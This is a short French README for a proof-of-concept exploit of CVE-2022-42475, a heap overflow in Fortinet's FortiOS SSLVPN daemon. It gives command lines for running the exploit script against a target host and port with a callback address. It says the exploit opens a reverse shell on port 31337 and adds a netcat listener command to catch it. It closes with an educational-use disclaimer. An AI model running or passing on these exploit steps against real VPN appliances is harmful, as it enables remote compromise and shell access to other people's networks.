
Vulnérabilité de dépassement de tampon dans FortiOS
https://nvd.nist.gov/vuln/detail/CVE-2022-42475 Code POC pour exploiter le débordement de tas dans le démon SSLVPN de Fortinet
Ceci est un POC rapide et sale qui ne fonctionnera probablement nulle part sauf si vous êtes extrêmement chanceux. Il dépend de la version et contient des décalages codés en dur qui changeront très probablement d'un système à l'autre.
python3 cve-2022-42475.py rhost rport lhost 'command'
python3 cve-2022-42475.py 192.168.10.1 8443 10.10.1.1 'ls -la /'
Le POC utilise une commande python pour mettre en place un reverse shell sur le port 31337
nc -lvnp 31337
Ce projet est réalisé uniquement à des fins éducatives et de tests éthiques. L'utilisation de cet outil pour attaquer des cibles sans consentement préalable et mutuel est illégale. Les développeurs déclinent toute responsabilité et ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.
Remerciements à Alain M - Twitter : @plopz0r